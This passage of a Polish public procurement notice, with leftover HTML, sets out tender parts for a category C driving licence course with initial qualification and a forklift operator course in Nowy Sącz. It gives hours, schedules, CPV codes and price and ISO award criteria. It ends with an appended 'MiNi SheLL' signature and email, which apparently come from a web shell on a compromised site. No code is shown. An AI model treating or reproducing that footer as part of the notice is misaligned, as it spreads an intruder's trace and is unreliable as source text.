w Ustawie Prawo o ruchu drogowym z dn. 20.06.1997 r. (Dz.U. z 2012 r. Nr 0 poz. 1137 z późn. zmianami), Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców  (Dz.U. z 2012 r., nr 0, poz. 1019), oraz Rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach (Dz. U. z 2012r. poz. 995).
Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
Czas trwania kursu wynosi nie dłużej niż 40 dni roboczych licząc od daty rozpoczęcia szkolenia. Szkolenie powinno składać się z części teoretycznej i praktycznej.
Liczba godzin zajęć dla każdego uczestnika szkolenia wynosi 60 godzin  zawierających:  
- 30 godzin zajęć teoretycznych,
- 30  godzin zajęć praktycznych.
Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek - czwartek). 
 Miejsce odbywania szkolenia: Nowy Sącz.
Zajęcia teoretyczne powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 16.00
Zajęcia praktyczne nie powinny trwać dłużej niż do 22.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakości usług - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs prawa jazdy kat. C wraz ze szkoleniem w ramach kwalifikacji wstępnej przyspieszonej dla prawa jazdy kat. C, C+E  dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie teoretyczne i praktyczne osoby skierowanej na kurs prawa jazdy kat. C do zdania egzaminu państwowego oraz nabycie uprawnień i podniesienie kwalifikacji zawodowych kierowców wykonujących transport drogowy. 
Zakres przedmiotowy szkolenia powinien być zrealizowany zgodnie z:
1)Ustawie Prawo o ruchu drogowym z dn. 20.06.1997 r. (Dz.U. z 2012 r. Nr 0 poz. 1137 z późn. zm.),
2)Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2012r., Nr 0, poz. 1265 z późn. zm.)
3) Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców  (Dz.U. z 2012 r., nr 0, poz. 1019), 
4)Rozporządzenie Ministra Infrastruktury z dnia 1 kwietnia 2010r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz.U. z 2010r. Nr 53, poz. 314);
5)Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach (Dz. U. z 2012r. poz. 995);
6)Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 16 stycznia 2013 r. w sprawie doskonalenia techniki jazdy (Dz. U. 2013, Nr 0, poz. 91);
7)Rozporządzenie MEN z dnia 11.01.2012r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 17.02.2012r. poz. 186).
2. Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
3. Szkolenie powinno się zakończyć najpóźniej w miesiącu październiku 2013r.
4. Liczba godzin zajęć dla każdego uczestnika szkolenia wynosi nie mniej niż 200 godzin zawierających:  
- dla Modułu I - szkolenie Prawo jazdy kat. C - min. 60 godzin, w tym:
4.1.   min. 20 godzin zajęć teoretycznych,
4.2.   min. 40  godzin zajęć praktycznych
- dla Modułu II - Szkolenie w ramach kwalifikacji wstępnej przyspieszonej dla prawa jazdy kat. C, 
C+E - min 140 godzin zegarowych, w tym:
część podstawowa- zajęcia teoretyczno - zawodowe - min 97 godzin
część specjalistyczna - min 43 godziny - obejmująca:
- min 33 godziny zajęć praktycznych
- min 8 godzin jazdy indywidualnej w ruchu drogowym
- min 2 godziny jazdy indywidualnej w warunkach specjalnych

Wymaga się aby zajęcia szkoleniowe odbywały się wyłącznie w dni robocze (poniedziałek - piątek). 
 Miejsce odbywania szkolenia: Nowy Sącz. 
Zajęcia teoretyczne powinny zaczynać się nie wcześniej niż o godz. 8.00, kończyć nie później niż o godzinie 16.00
Zajęcia praktyczne nie powinny trwać dłużej niż do 22.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certyfikat jakości usług ISO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kierowca wózka jezdniowego z wymianą butli gazowej dla 1 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest nabycie przez kursanta wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy w zawodzie kierowcy wózka jezdniowego z bezpieczną wymianą butli .
Planowany termin rozpoczęcia szkolenia: do 7 dni od  dnia podpisania umowy.
Planowany czas trwania szkolenia ( w tym egzamin) wynosi do 20 dni roboczych licząc od daty rozpoczęcia szkolenia. Szkolenie powinno składać się z części teoretyczno-zawodowej i praktycznej.
Liczba godzin zajęć dla każdego uczestnika szkolenia wynosi 77 godzin 
    zawierających:  
-  58 godzin zajęć teoretyczno-zawodowych związanych z obsługą wózka jezdniowego - Moduł I
-  19 godzin zajęć praktycznych - Moduł II.
Wymaga się aby zajęcia odbywały się wyłącznie w dni robocze (poniedziałek - piatek). Liczba godzin w dniu - do 6 godz. 
Zajęcia szkoleniowe nie mogą trwać dłużej niż do godz. 16.00.
Miejsce realizacji szkolenia: Nowy Sącz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. certfikat jakości usług ISO - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com